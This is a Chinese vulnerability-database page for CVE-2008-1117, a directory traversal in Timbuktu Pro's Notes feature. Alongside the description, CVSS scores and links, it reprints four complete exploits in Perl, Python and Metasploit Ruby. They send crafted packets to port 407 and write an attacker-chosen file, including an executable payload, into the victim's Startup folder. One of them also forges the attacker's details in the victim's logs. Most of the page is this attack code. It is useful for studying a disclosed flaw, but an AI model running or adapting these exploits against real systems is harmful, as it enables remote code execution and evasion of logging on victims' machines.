| CVE-2008-1117 |
|
发布时间 :2008-03-14 16:44:00 | ||
| 修订时间 :2011-03-07 22:05:58 | ||||
| NMCOEPS |
[原文]Directory traversal vulnerability in the Notes (aka Flash Notes or instant messages) feature in tb2ftp.dll in Timbuktu Pro 8.6.5 for Windows, and possibly 8.7 for Mac OS X, allows remote attackers to upload files to arbitrary locations via a destination filename with a \ (backslash) character followed by ../ (dot dot slash) sequences. NOTE: this can be leveraged for code execution by writing to a Startup folder. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2007-4220.
[CNNVD]Timbuktu Pro tb2pro.exe ‘tb2ftp.dll’目录遍历攻击漏洞(CNNVD-200803-228)
Motorola的Timbuktu Pro是一款远程控制软件,允许远程访问计算机桌面。
Timbuktu的tb2pro.exe所加载的tb2ftp.dll库在实现Notes功能期间检查目标文件名时没有正确地过滤”\”和”/”字符,攻击者执行目录遍历攻击,向目标机器的任意位置上传文件;
–
CVSS (基础分值)
| CVSS分值: | 10 | [严重(HIGH)] |
| 机密性影响: | COMPLETE | [完全的信息泄露导致所有系统文件暴露] |
| 完整性影响: | COMPLETE | [系统完整性可被完全破坏] |
| 可用性影响: | COMPLETE | [可能导致系统完全宕机] |
| 攻击复杂度: | LOW | [漏洞利用没有访问限制 ] |
| 攻击向量: | NETWORK | [攻击者不需要获取内网访问权或本地访问权] |
| 身份认证: | NONE | [漏洞利用无需身份认证] |
–
CWE (弱点类目)
| CWE-22 | [对路径名的限制不恰当(路径遍历)] |
–
CPE (受影响的平台与产品)
| 产品及版本信息(CPE)暂不可用 |
–
OVAL (用于检测的技术细节)
| 未找到相关OVAL定义 |
–
官方数据库链接
–
其它链接及资源
|
http://www.vupen.com/english/advisories/2008/0840 (UNKNOWN) VUPEN ADV-2008-0840 |
|
http://www.securityfocus.com/bid/28081 (UNKNOWN) BID 28081 |
|
http://www.securityfocus.com/archive/1/archive/1/489414/100/0/threaded (UNKNOWN) BUGTRAQ 20080311 CORE-2008-0204: Timbuktu Pro Remote Path Traversal and Log Injection |
|
http://www.securityfocus.com/archive/1/archive/1/489382/100/0/threaded (UNKNOWN) BUGTRAQ 20080311 Re: [Full-disclosure] Vulnerabilities in Timbuktu Pro 8.6.5 |
|
http://www.securityfocus.com/archive/1/archive/1/489360/100/0/threaded (UNKNOWN) BUGTRAQ 20080310 Vulnerabilities in Timbuktu Pro 8.6.5 |
|
http://www.milw0rm.com/exploits/5238 (UNKNOWN) MILW0RM 5238 |
|
http://www.milw0rm.com/exploits/4455 (UNKNOWN) MILW0RM 4455 |
|
http://www.coresecurity.com/?action=item&id=2166 (UNKNOWN) MISC http://www.coresecurity.com/?action=item&id=2166 |
|
http://securityreason.com/securityalert/3741 (UNKNOWN) SREASON 3741 |
|
http://secunia.com/advisories/29316 (VENDOR_ADVISORY) SECUNIA 29316 |
|
http://aluigi.org/poc/timbuto.zip (UNKNOWN) MISC http://aluigi.org/poc/timbuto.zip |
|
http://aluigi.altervista.org/adv/timbuto-adv.txt (UNKNOWN) MISC http://aluigi.altervista.org/adv/timbuto-adv.txt |
–
漏洞信息
| Timbuktu Pro tb2pro.exe ‘tb2ftp.dll’目录遍历攻击漏洞 | |
| 危急 | 路径遍历 |
| 2008-03-14 00:00:00 | 2008-09-05 00:00:00 |
| 远程 | |
| Motorola的Timbuktu Pro是一款远程控制软件,允许远程访问计算机桌面。 Timbuktu的tb2pro.exe所加载的tb2ftp.dll库在实现Notes功能期间检查目标文件名时没有正确地过滤”\”和”/”字符,攻击者执行目录遍历攻击,向目标机器的任意位置上传文件; |
|
–
公告与补丁
|
目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.motorola.com/ |
–
漏洞信息 (4455)
| Motorola Timbuktu Pro <= 8.6.5 File Deletion/Creation Exploit (EDBID:4455) | |
| windows | remote |
| 2008-03-11 | Verified |
| 0 | titon |
N/A |
[点击下载] |
#!/usr/bin/perl
#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
# Timbuktu Pro <= 8.6.5 Arbitrary File Deletion/Creation
#
# Bug & Exploit by titon [titon{at}bastardlabs{dot}com]
#
# Advisory:
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=590
#
# Copyright: (c)2007 BastardLabs
#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
#
# Usage: $ ./timbuktu_sploit.pl 192.168.0.69 407
#
#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
use IO::Socket;
use Time::HiRes qw(usleep);
##
## we start in the C:\Program Files\Timbuktu Pro\N1\ folder
##
$filename = &promptUser("Filename" ,"\\../../../pnw3d.bat");
##$filename = &promptUser("Filename" ,"../../../pnw3d.bat");
$payload = &promptUser("Payload ","echo pwwwnnn333ddd !!");
##
##payload can be either text or binary (in \x42\x69\x42 format)
##
$payload =~ s/\\x(..)/pack("C",hex($1))/egi;
##
## packet1 == “hello†packet
##
$packet1= "\x00\x01\x6b\x00\x00\xb0\x00\x23\x07\x22\x03\x07\xd6\x69\x6d\x3b".
"\x27\xa8\xd0\xf2\xd6\x69\x6d\x3b\x27\xa8\xd0\xf2\x00\x09\x01\x41".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x01\x97\x01\x41\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\xb7\x1d".
"\xbf\x42\x00\x00\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00";
$packet2= "\xff";
##
## packet3 == packet containing the filename (with directory traversal)
##
$packet3= "\xfb\x00\x00\x00\x00\x54\x45\x58\x54\x74\x74\x78\x74\xc2\x32\x94".
"\xcc\xc2\x32\x94\xd9\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00".
"\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00" . pack("C",length($filename)) . $filename ;
$packet4= "\xf9\x00";
##
## packet5 == payload, the size of the payload is over 2 bytes
## so we have 65535 bytes of data to play with
##
$packet5= "\xf8" . pack("n",length($payload)) . $payload ;
$packet6= "\xf7";
$packet7= "\xfa";
$packet8= "\xfe";
##
##DELETE THE FILE (IF NECESSARY)
##
print "[+] Delete the file (if necessary)\n";
print "[+] Connecting...\n";
$remote = &connection("$ARGV[0]","$ARGV[1]");
print "[+] Connected to $ARGV[0]:$ARGV[1]\n";
print $remote $packet1; print "[+] Packet 1 Sent\n"; usleep (80000);
print $remote $packet2; print "[+] Packet 2 Sent\n"; usleep (80000);
print $remote $packet3; print "[+] Packet 3 Sent\n"; usleep (80000);
##
## we break the connection before it's completed (i.e before the \xfe)
##
close $remote;
##
##(RE)CREATE THE FILE
##
print "[+] (Re)Create the file with our content\n";
print "[+] Connecting...\n";
$remote = &connection("$ARGV[0]","$ARGV[1]");
print "[+] Connected to $ARGV[0]:$ARGV[1]\n";
print $remote $packet1; print "[+] Packet 1 Sent\n"; usleep (80000);
print $remote $packet2; print "[+] Packet 2 Sent\n"; usleep (80000);
print $remote $packet3; print "[+] Packet 3 Sent\n"; usleep (80000);
print $remote $packet4; print "[+] Packet 4 Sent\n"; usleep (80000);
print $remote $packet5; print "[+] Packet 5 Sent\n"; usleep (80000);
print $remote $packet6; print "[+] Packet 6 Sent\n"; usleep (80000);
print $remote $packet7; print "[+] Packet 7 Sent\n"; usleep (80000);
print $remote $packet8; print "[+] Packet 8 Sent\n"; usleep (80000);
close $remote;
sub connection
{
local($dest,$port) = @_;
my $remote;
if (!$port or !dest) {
print "\nUsage: $ ./timbuktu_sploit.pl 192.168.0.69 407\n\n"; exit; }
else
{
$remote = IO::Socket::INET->new(
Proto => tcp,
PeerAddr => $dest,
PeerPort => $port,
Timeout => 1) or print "[-] Error: Could not establish a
connection to $dest:$port\n" and exit;
return $remote;
}
}
sub promptUser {
local($promptString,$defaultValue) = @_;
if ($defaultValue) {
print $promptString, "[", $defaultValue, "]: ";
} else {
print $promptString, ": ";
}
$| = 1; # force a flush after our print
$_ = ; # get the input from STDIN
chomp;
if ("$defaultValue") {
return $_ ? $_ : $defaultValue; # return $_ if it has a value
} else {
return $_;
}
}
# milw0rm.com [2007-09-25]
# milw0rm.com [2008-03-11]
–
漏洞信息 (5238)
|
Motorola Timbuktu Pro 8.6.5/8.7 Path Traversal / Log Injection Exploit (EDBID:5238) |
|
| windows | remote |
| 2008-03-11 | Verified |
| 0 | Core Security |
N/A |
[点击下载] |
# Core Security Technologies - CoreLabs Advisory
# http://www.coresecurity.com/corelabs
# Title: Timbuktu Pro Remote Path Traversal and Log Injection
# Advisory ID: CORE-2008-0204
# Advisory URL: http://www.coresecurity.com/?action=item&id=2166
# Date published: 2008-03-11
# Date of last update: 2008-03-11
# Vendors contacted: Motorola
# Release mode: Forced release
# Proof of concept code follows. This PoC allows a remote attacker to
# upload a file to an arbitrary location on the victim's machine and forge
# peer information on the log lines of the victim's application.
from sys import argv
from socket import *
from struct import pack
#from utils import printFormatted
#from time import sleep
init_send_op_packet = ( '\x00\x01\x60\x00\x00\x52\x00\x25'
'\x00\x22\x02\x01\x00\x04\x03\x07'
'\x00\x05\x00\x01\x00\x00\x00\xf1'
'\x06\x00\xf7\x76\xdd\x77\x00\x00'
'\x00\x00\x08\x7c\x67\x60\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x18\xf1\x06\x00\xd1\x90'
'\xbc\x60\x38\xf1\x06\x00\x32\x94'
'\xc1\x60\x50\x92\xc4\x60\x00\x00'
'\x00\x00\x18\x92\xc4\x60\x2d\xbe'
'\x80\x7c\x08\x7c\x67\x60\x20\x46'
)
second_send_op_packet = ( '\x00\x01\x61\x00\x00\x52\x00\x25'
'\x00\x22\x02\x01\x00\x04\x03\x07'
'\x00\x05\x00\x01\x10\x00\xe0\xf0'
'\x06\x00\x51\x05\x91\x7c\x28\x09'
'\x08\x00\x6d\x05\x91\x7c\x1c\xf1'
'\x06\x00\x02\x00\x00\x00\x10\x00'
'\x00\x00\xb8\xf5\xbe\x60\x00\x00'
'\xac\x00\x00\x00\x00\x00\xbd\xf5'
'\xbe\x60\x30\x90\xc4\x60\x07\x00'
'\x00\x00\xd0\x13\x63\x60\x71\xfb'
'\x90\x7c\x40\xf0\x06\x00\x0e\x00'
)
peer_info_exchange = ( '\x00\x01\x62\x00\x00\xb0\x00\x23'
'\x07\x22\x03\x07\x70\x2c\xa5\x51'
'\x4c\xca\xe3\xfb\x70\x2c\xa5\x51'
'\x4c\xca\xe3\xfb\x00\x09'
'%(user_name)s'
'\x01\x97'
'%(host_name)s'
''
'\x00\x00\x01\x02\x00\x04'
'\xb1\x1c\x39\x51\x00\x00\x00\x00'
'%(guest_ip_address)s'
'\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00'
)
ack_peer_info = '\xff'
attach_info_packet = ('\xfb\x00\x00\x00\x00'
'BINAmdos'
'\xc2\x12\x49\xaf\xbd\x35\xac\x98'
'\x00\x00\x00\x00'
'%(attachment_length)s'
'\x00\x00\x00\x00'
'\xff\xff\xff\xff\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00'
'%(attachment_filename)s'
)
attach_info_ack1 = '\xf9\x00'
# Transfer file content here !!!
# \xF8 + 2 byte length + data
attach_file_ack1 = '\xf7'
attach_file_ack2 = '\xfa'
class Tb2FileSender:
'''
Fake timbuktu client that implements the 'Notes' feature to send a
message with a file attached to it.
'''
def __init__(self, target, fake_src_ip, fake_hostname, fake_username, dest_filename, file_content):
'''
Setup TCP Connection to standard port TCP/407
'''
self.sck = socket(AF_INET, SOCK_STREAM)
self.sck.connect((target, 407))
self.fake_src_ip = fake_src_ip
self.fake_hostname = fake_hostname # Peer computer name
self.fake_username = fake_username # Peer user name
self.dest_filename = dest_filename # Destination filename including path (like ../../a.exe)
self.file_content = file_content # Content of the destination file
def sendAndRecv(self, packet, log, expected_response_length=0x500, print_response=False):
self.sck.send(packet)
if log:
print '[-] %s' % log
if expected_response_length > 0:
resp = self.sck.recv(expected_response_length)
if print_response:
#printFormatted(resp)
print '-' * 70 + '\n'
return resp
return None
def getPascalString(self, str):
'''
Format the strings as 1 Byte Length + String.
'''
return pack('B', len(str)) + str
def createFakePeerInfoPacket(self):
'''
Create a packet with forged guest information to avoid giving away
real info in the log files.
'''
#
# Ohhh... by the way, these two names goes diretly to the log file... ehehhee :)
#
guest_host_name = self.fake_hostname.replace('\\n', '\r\n')
guest_user_name = self.fake_username.replace('\\n', '\r\n')
username_max_len = 0x37 # This is not the application real limit,
hostname_max_len = 0x3f # but it is the limit for this packet.
host_name = self.getPascalString(guest_host_name)
user_name = self.getPascalString(guest_user_name)
# Pad the string to fill the empty space and avoid packet length recalculation
host_name += ('\x00' * (hostname_max_len - len(guest_host_name)))
user_name += ('\x00' * (username_max_len - len(guest_user_name)))
guest_ip_address = self.fake_src_ip.split('.')
guest_ip_address = pack('BBBB', int(guest_ip_address[0]), int(guest_ip_address[1]), int(guest_ip_address[2]), int(guest_ip_address[3]))
return peer_info_exchange % vars()
def getAttachContent(self):
'''
Retrieve the content of the local file and send it as the attach content.
'''
fd = open(self.file_content, 'rb')
data = fd.read()
fd.close()
return data
def send(self):
'''
Send a sequence of packet to upload our data to the filename and path
specified by the user's parameters.
'''
# Begin protocol negotiation with the target
self.sendAndRecv(init_send_op_packet, 'Note Operation initial packet sent.')
self.sendAndRecv(second_send_op_packet, 'Note Operation negotiation packet sent.')
# Send the packet with our fake info to fool the logs :)
self.sendAndRecv(self.createFakePeerInfoPacket(), 'Peer info packet sent.')
self.sendAndRecv(ack_peer_info, 'Ack peer info packet sent.')
# Setup attachment packets that contain information about the file being transfered
max_trx_chunk_size = 0x5B4
trx_until_resync = 0x16C5
payload = self.getAttachContent()
payload_length = len(payload)
attachment_length = pack('>L', payload_length)
#
# Send info about the attachment.
#
# The '\' character is nedded to bypass the application filter.
# This is actually the Bug !
attachment_filename = self.getPascalString('\\' + self.dest_filename.replace('\\', '/'))
attach_info = attach_info_packet % vars()
self.sendAndRecv(attach_info , 'Attachment info sent.')
self.sendAndRecv(attach_info_ack1, 'Attachment intermediate info sent.')
# Create a list with the chunks to send and prepare their headers is appropriate
attachment_content = list()
# We check if the data to send fits into one set of chunks.
if payload_length < max_trx_chunk_size:
attachment_content.append('\xF8' + pack('>H', payload_length) + payload)
else:
# If the data is bigger than one chunk, then send multiple chunks and their headers.
curr_pos = 0 # keeps our current position into the data file content
resync_chunk = True # flag to indicate if a new set of chunk should be set
pos_in_chunk = 0 # keeps our position into the current chunk set
do_recv = False # flag to indicate if recv is needed to receive target data
while curr_pos <= payload_length:
do_recv = False
# Is this the last chunk ?
if curr_pos > 0 and pos_in_chunk != trx_until_resync:
# If it is the last chunk, then just set length to the rest of the data
if trx_until_resync - pos_in_chunk < max_trx_chunk_size:
chunk_length = trx_until_resync - pos_in_chunk
do_recv = True
else:
# Otherwise, set the data length as usual because it's an intermediate chunk
chunk_length = max_trx_chunk_size data = ''
else:
# Start a new set of chunks and check if this is not the last set
# If it is, then don't set the maximun size, just the rest of the length.
data = '\xF8' # Set the chunk set header
if payload_length - curr_pos < trx_until_resync:
chunk_length = payload_length - curr_pos
data += pack('>H', chunk_length)
else:
# This is not the last chunk, so we set the maximun size and begin
# it transmittion.
chunk_length = max_trx_chunk_size
data += pack('>H', trx_until_resync) pos_in_chunk = 0
# Append the current chunk into a list to be sent later
attachment_content.append((do_recv, data + payload[curr_pos : curr_pos + chunk_length]))
curr_pos += chunk_length
pos_in_chunk += chunk_length
#
# Send file content in small chunks
#
print '[-] Beginning file transfer... (this may take some time)'
for chunk in attachment_content:
if chunk[0]:
do_recv = 0x500
else:
do_recv = 0
self.sendAndRecv(chunk[1], '', do_recv)
#sleep(0.5)
print '[-] File transfer complete'
# Send the final ACKs to allow the program to create the remote file.
self.sendAndRecv(attach_file_ack1, 'Note body intermediate info sent.')
self.sendAndRecv(attach_file_ack2, 'Note body intermediate info sent.')
# Close the connection here to avoid the program displaying any message
self.sck.close()
return
if __name__ == "__main__":
if len(argv) != 7:
print (r'\nUsage:\n\n%s '
' \n\n'
'Example:\n\n'
'%s victim.com 1.2.3.4 trust.com yourAdmin "..\..\..\Documents And Settings\All Users\Start Menu\Programs\Startup\evil.exe" c:\payload.exe' % (argv[0], argv[0]) )
else:
target = argv[1]
fake_src_ip = argv[2]
fake_hostname = argv[3]
fake_username = argv[4]
dest_filename = argv[5]
file_content = argv[6]
tb2 = Tb2FileSender(target, fake_src_ip, fake_hostname, fake_username, dest_filename, file_content)
tb2.send()
# milw0rm.com [2008-03-11]
–
漏洞信息 (16339)
| Timbuktu Pro Directory Traversal/File Upload (EDBID:16339) | |
| windows | remote |
| 2010-11-24 | Verified |
| 0 | metasploit |
N/A |
[点击下载] |
##
# $Id: timbuktu_fileupload.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Timbuktu Pro Directory Traversal/File Upload',
'Description' => %q{
This module exploits a directory traversal vulnerablity in Motorola's
Timbuktu Pro for Windows 8.6.5.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11127 $',
'References' =>
[
[ 'CVE', '2008-1117' ],
[ 'OSVDB', '43544' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 10 2008'))
register_options(
[
Opt::RPORT(407),
OptString.new('PATH', [ true, 'The path to place the executable.', '\\../../../Documents and Settings/All Users/Start Menu/Programs/Startup/']),
], self.class)
end
def exploit
connect
exe = rand_text_alpha(8) + ".exe"
data = generate_payload_exe
pkt1 = "\x00\x01\x6B\x00\x00\xB0\x00\x23\x07\x22\x03\x07\xD6\x69\x6D\x3B"
pkt1 << "\x27\xA8\xD0\xF2\xD6\x69\x6D\x3B\x27\xA8\xD0\xF2\x00\x09\x01\x41"
pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt1 << "\x00\x00\x00\x00\x00\x00\x01\x97\x01\x41\x00\x00\x00\x00\x00\x00"
pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\xB7\x1D"
pkt1 << "\xBF\x42\x00\x00\x00\x00\x7F\x00\x00\x01\x00\x00\x00\x00\x00\x00"
pkt1 << "\x00\x00\x00\x00\x00\x00"
pkt3 = "\xFB\x00\x00\x00\x00\x54\x45\x58\x54\x74\x74\x78\x74\xC2\x32\x94"
pkt3 << "\xCC\xC2\x32\x94\xD9\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00"
pkt3 << "\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt3 << "\x00\x00\x00\x00\x00\x00\x00"
pkt3 << [datastore['PATH'].length + exe.length].pack('C') + datastore['PATH'] + exe
print_status("Connecting to #{rhost} on port #{rport}...")
sock.put(pkt1)
select(nil,nil,nil,0.15)
sock.put("\xFF")
select(nil,nil,nil,0.15)
sock.put(pkt3)
select(nil,nil,nil,0.15)
sock.put("\xF9\x00")
select(nil,nil,nil,0.15)
print_status("Sending EXE payload '#{exe}' to #{rhost}:#{rport}...")
sock.put("\xF8" + [data.length].pack('n') + data)
select(nil,nil,nil,5)
sock.put("\xF7")
select(nil,nil,nil,0.15)
sock.put("\xFA")
select(nil,nil,nil,0.15)
sock.put("\xFE")
select(nil,nil,nil,0.08)
print_status("Done!")
disconnect
end
end
-
漏洞信息 (F82939)
| Timbuktu Pro Directory Traversal/File Upload. (PacketStormID:F82939) |
2009-11-26 00:00:00 |
| MC metasploit.com |
exploit |
windows |
CVE-2008-1117 |
[点击下载] |
|
This Metasploit module exploits a directory traversal vulnerability in Motorola's Timbuktu Pro for Windows 8.6.5. |
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Timbuktu Pro Directory Traversal/File Upload.',
'Description' => %q{
This module exploits a directory traversal vulnerablity in Motorola's
Timbuktu Pro for Windows 8.6.5.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-1117' ],
[ 'OSVDB', '43544' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 10 2008'))
register_options(
[
Opt::RPORT(407),
OptString.new('PATH', [ true, 'The path to place the executable.', '\\../../../Documents and Settings/All Users/Start Menu/Programs/Startup/']),
], self.class)
end
def exploit
connect
exe = rand_text_alpha(8) + ".exe"
data = Rex::Text.to_win32pe(payload.encoded, '')
pkt1 = "\x00\x01\x6B\x00\x00\xB0\x00\x23\x07\x22\x03\x07\xD6\x69\x6D\x3B"
pkt1 << "\x27\xA8\xD0\xF2\xD6\x69\x6D\x3B\x27\xA8\xD0\xF2\x00\x09\x01\x41"
pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt1 << "\x00\x00\x00\x00\x00\x00\x01\x97\x01\x41\x00\x00\x00\x00\x00\x00"
pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\xB7\x1D"
pkt1 << "\xBF\x42\x00\x00\x00\x00\x7F\x00\x00\x01\x00\x00\x00\x00\x00\x00"
pkt1 << "\x00\x00\x00\x00\x00\x00"
pkt3 = "\xFB\x00\x00\x00\x00\x54\x45\x58\x54\x74\x74\x78\x74\xC2\x32\x94"
pkt3 << "\xCC\xC2\x32\x94\xD9\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00"
pkt3 << "\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt3 << "\x00\x00\x00\x00\x00\x00\x00"
pkt3 << [datastore['PATH'].length + exe.length].pack('C') + datastore['PATH'] + exe
print_status("Connecting to #{rhost} on port #{rport}...")
sock.put(pkt1)
sleep(0.15)
sock.put("\xFF")
sleep(0.15)
sock.put(pkt3)
sleep(0.15)
sock.put("\xF9\x00")
sleep(0.15)
print_status("Sending EXE payload '#{exe}' to #{rhost}:#{rport}...")
sock.put("\xF8" + [data.length].pack('n') + data)
sleep(5)
sock.put("\xF7")
sleep(0.15)
sock.put("\xFA")
sleep(0.15)
sock.put("\xFE")
sleep(0.08)
print_status("Done!")
disconnect
end
end
-
漏洞信息 (F64510)
| Core Security Technologies Advisory 2008.0204 (PacketStormID:F64510) |
2008-03-13 00:00:00 |
| Core Security Technologies,Sebastian Muniz coresecurity.com |
exploit,remote,vulnerability |
CVE-2008-1117,CVE-2008-1118 |
[点击下载] |
|
Core Security Technologies Advisory - Timbuktu Pro suffers from remote path traversal and log injection vulnerabilities. |
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs
Timbuktu Pro Remote Path Traversal and Log Injection
*Advisory Information*
Title: Timbuktu Pro Remote Path Traversal and Log Injection
Advisory ID: CORE-2008-0204
Advisory URL: http://www.coresecurity.com/?action=item&id=2166
Date published: 2008-03-11
Date of last update: 2008-03-11
Vendors contacted: Motorola
Release mode: Forced release
*Vulnerability Information*
Class: Remote Path Traversal
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 28081
CVE Name: CVE-2008-1117, CVE-2008-1118
*Vulnerability Description*
Timbuktu Pro [1] is a desktop-to-desktop remote control software for the
Windows and Macintosh operating systems. The following vulnerabilities
have been identified in Timbuktu Pro:
1) File transfer directory traversal (CVE-2008-1117): The '\' and '/'
are not properly sanitized when checking the destination filename. The
problem resides in the Notes feature implemented by tb2ftp.dll loaded by
the tb2pro.exe. This is the main issue.
2) Log input manipulation (CVE-2008-1118): Several fields of the packet
containing peer information (computer name, user name and IP address)
are taken from the packet sent to the target and used to display this
information on the screen of the target.
The vulnerabilities discovered allow a remote attacker to upload a file
to an arbitrary location on the victim's machine and forge peer
information on the log lines of the victim's application. For example,
an attacker could write an executable in a startup directory of the
victim's machine and wait for the user to restart his/her machine.
Another example is to write a fake system DLL in an existing program
directory, inducing Windows to load this module instead of the real DLL
from 'C:\WINDOWS\system32\'
*Vulnerable Packages*
. Timbuktu Pro 8.6.5 for Windows.
. Timbuktu Pro 8.7 for Mac OS X may also be vulnerable.
*Non-vulnerable Packages*
*Vendor Information, Solutions and Workarounds*
Contact the vendor for fix information.
*Credits*
This vulnerability was discovered and researched by Sebastian Mu
-
漏洞信息
43544 |
|
| Motorola Timbuktu Pro Flash Notes (tb2ftp.dll) Traversal Arbitrary File Upload | |
Remote / Network Access |
Input Manipulation |
| Loss of Integrity | |
| Exploit Public | Uncoordinated Disclosure |
-
漏洞描述
| Timbuktu contains a flaw that allows a remote attacker to upload files to arbitrary locations outside of the web path. The issue is due to the Flash Notes component not properly sanitizing user input, specifically failing to properly escape the '/' and '\' characters. |
-
时间线
2008-03-10 |
Unknow |
| 2008-03-10 | Unknow |
-
解决方案
| Currently, there are no known upgrades, patches, or workarounds available to correct this issue. |
-
相关参考
|
-
漏洞作者
-
漏洞信息
| Timbuktu Pro File Upload and Log Input Manipulation Vulnerabilities | |
Input Validation Error |
28081 |
| Yes | No |
| 2008-03-10 12:00:00 | 2008-03-12 12:31:00 |
Sebastian Muñiz is credited with the discovery of these vulnerabilities. |
|
-
受影响的程序版本
| Motorola Timbuktu 8.6.5 |
-
漏洞讨论
| Timbuktu Pro is prone to an arbitrary-file-upload vulnerability and a vulnerability that allows attackers to disrupt the logging of events. An attacker can exploit these issues to upload arbitrary files and prevent the logging of events. This may lead to other attacks. Timbuktu Pro 8.6.5 for Windows is vulnerable; other versions running on different platforms may also be affected. The file-upload vulnerability may be related to BID 25453 (Motorola Timbuktu Pro Directory Traversal Vulnerability). |
-
漏洞利用
|
Attackers can use readily available tools to exploit these issues. The following exploit code is available: |
-
解决方案
|
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]. |
-
相关参考
|
![[八卦] 王婷婷—揭秘一个大三女生的性爱录像-微慑信息网-VulSee.com](http://free.86hy.com/crack/pic/1.jpg)
![[随笔]今天国际警察节-微慑信息网-VulSee.com](http://photo.sohu.com/20041017/Img222528326.jpg)
青云网
